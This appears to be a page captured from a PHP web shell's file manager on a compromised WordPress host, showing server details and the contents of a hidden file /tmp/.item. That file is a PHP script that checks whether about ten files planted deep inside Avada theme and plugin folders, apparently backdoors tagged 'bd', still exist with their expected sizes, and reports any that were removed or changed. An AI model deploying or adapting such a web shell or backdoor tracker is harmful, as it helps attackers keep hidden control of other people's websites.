SCHWEIS
Server: LiteSpeed
System: Linux server252.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: corofmbe (1985)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //tmp/.item
<?php   $r = '/home/corofmbe/public_html'; $x = ["/wp-content/plugins/fusion-builder/inc/lib/inc/redux/custom-fields/ace_editor/field.ace.editor.php"=>"bd@@1293596@@1007",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/colorrgba/validation.colorrgba.php"=>"bd@@1290552@@851",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/slides/field.slides.php"=>"bd@@1293371@@1043",
"/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/validation/color/validation.color.php"=>"bd@@1293439@@920",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/color_gradient/field.color.gradient.php"=>"bd@@1290413@@968",
"/wp-content/themes/Avada/woocommerce/compatibility/3.2/single-product/tabs/additional.information.php"=>"bd@@1290694@@1016",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/raw/parsedown.raw.php"=>"bd@@1290467@@894",
"/wp-content/themes/Avada/includes/lib/inc/redux/custom-fields/color_alpha/field.color.alpha.php"=>"bd@@1293541@@813",
"/wp-content/plugins/wordpress-seo/vendor/ruckusing/ruckusing-migrations/lib/Task/Hello/ThreeWay.php"=>"bd@@1293559@@915",
"/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/no_html/validation.no.html.php"=>"bd@@1290510@@939"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');